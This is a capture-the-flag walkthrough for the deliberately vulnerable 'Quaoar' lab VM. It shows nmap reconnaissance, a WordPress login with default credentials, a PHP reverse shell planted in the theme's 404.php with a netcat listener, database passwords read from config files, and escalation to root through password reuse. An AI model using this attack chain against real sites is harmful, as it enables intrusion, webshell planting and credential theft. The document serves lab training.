Quaoar walkthrough :
Difficulty : very easy

==================================
Attack ip : 172.16.18.130
Quaoar ip : 172.16.18.133

==================================
Phase 1 :
Information gathering :
scan with nmap (basic scan for the moment) :
nmap -sV 172.16.18.133

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-31 21:52 CET
Nmap scan report for 172.16.18.133
Host is up (0.0016s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3?
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3s?
MAC Address: 00:0C:29:31:06:D9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.98 seconds

Very good interesting ports :
22 => SSH => OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80 => HTTP => Apache httpd 2.2.22 ((Ubuntu))
139 => Netbios-ssn => Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445 => Idem

Well it's easy VM so we are lazy, go to browser.
When you open the website we have got an image. No way with it !!!

Reflex when we have a website :
call robots.txt, every website have this page and often content very good informations about the website.

It contain :
Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|   
                                     

Well we find another things : /wordpress/
Call this page !
We have another things, can we have the admin login page (wp-login by default).
http://172.16.18.133/wordpress/wp-login.php
Well now we have a page of login and password.
One shoot : admin, and password for password.
2 informations and one indication :
if you enter a wrong user : 
ERROR: Invalid username. Lost your password?
if you enter a good user :
ERROR: The password you entered for the username admin is incorrect. Lost your password?

we have many choice : 
- bruteforce (use wfuzz, hydra, or another tool)
- it's a very easy challenge, so we test some useful default password forgentten when wp is installed :
	- admin/password => no
	- admin/admin => yes (very very easy!!!)

Well now we have are the user admin.
Another choice, what can we do when you are admin of a site ?
	- create user, page, all you want, no restriction.
	- create a backdoor, put malware, make phising with a plug-in
	- for this challenge just change the 404.php
		got in the themes editor and change the code of the 404.php 
		(/usr/share/webshell/php/php-reverse-shell.php or here http://pentestmonkey.net/tools/php-reverse-shell, my preference).
Configure the reverse shell code php : 
$ip = '172.16.18.130';  // CHANGE THIS
$port = 4547;       // CHANGE THIS

In the attacker machine : nc -lvp 4547

Call a webpage doesn't exist (call the 404.php).
example :
172.16.18.133/wordpress/?p=78

And we have a reverse shell :
nc -lvp 4547
listening on [any] 4547 ...
172.16.18.133: inverse host lookup failed: Unknown host
connect to [172.16.18.130] from (UNKNOWN) [172.16.18.133] 56763
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 16:30:30 up 52 min,  0 users,  load average: 0.55, 0.31, 0.20
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home/wpadmin
flag one :
go to the home page og wpadmin and we found the first flag.txt

Search for other critical informations :
$ cd /var/www/upload
$ ls -l
total 56
drwxr-xr-x  4 www-data www-data 4096 Oct 12  2016 account
drwxr-xr-x 21 www-data www-data 4096 Oct 12  2016 admins
-rw-r--r--  1 www-data www-data  832 Jan 15  2017 config.php
drwxr-xr-x  3 www-data www-data 4096 Oct 12  2016 framework
drwxr-xr-x  5 www-data www-data 4096 Oct 12  2016 include
-rw-r--r--  1 www-data www-data 4548 Oct 12  2016 index.php
drwxr-xr-x  2 www-data www-data 4096 Oct 12  2016 languages
drwxr-xr-x  3 www-data www-data 4096 Oct 12  2016 media
drwxr-xr-x 22 www-data www-data 4096 Oct 12  2016 modules
drwxr-xr-x  3 www-data www-data 4096 Oct 12  2016 page
drwxr-xr-x  2 www-data www-data 4096 Oct 12  2016 search
drwxr-xr-x  3 www-data www-data 4096 Nov  9  2016 temp
drwxr-xr-x  6 www-data www-data 4096 Oct 12  2016 templates

$ cd /var/www/upload
$ cat config.php

define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');

$ cd /var/www/wordpress
$ less wp-config.php
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

We want to have a bash :
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Quaoar:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We test to be root :
www-data@Quaoar:/$ su
su
Password: rootpassword!

root@Quaoar:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Quaoar:/# find / -name flag
find / -name flag
root@Quaoar:/# find / -name flag* 2>/dev/null
find / -name flag* 2>/dev/null
/root/flag.txt
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/virbr0/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:00.0/net/eth0/flags
/usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al
/usr/lib/gcc/avr/4.5.3/plugin/include/flags.h
/usr/src/linux-headers-3.16.0-23-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-3.16.0-23/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-3.16.0-24-generic/include/config/zone/dma/flag.h
/var/www/upload/templates/algos/images/flags
/var/www/upload/modules/lib_semantic/dist/themes/default/assets/images/flags.png
/home/wpadmin/flag.txt
root@Quaoar:/# 

root@Quaoar:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:31:06:d9 brd ff:ff:ff:ff:ff:ff
    inet 172.16.18.133/24 brd 172.16.18.255 scope global eth0
    inet6 fe80::20c:29ff:fe31:6d9/64 scope link 
       valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN 
    link/ether 1e:df:8c:77:09:d5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
root@Quaoar:/# 

======================================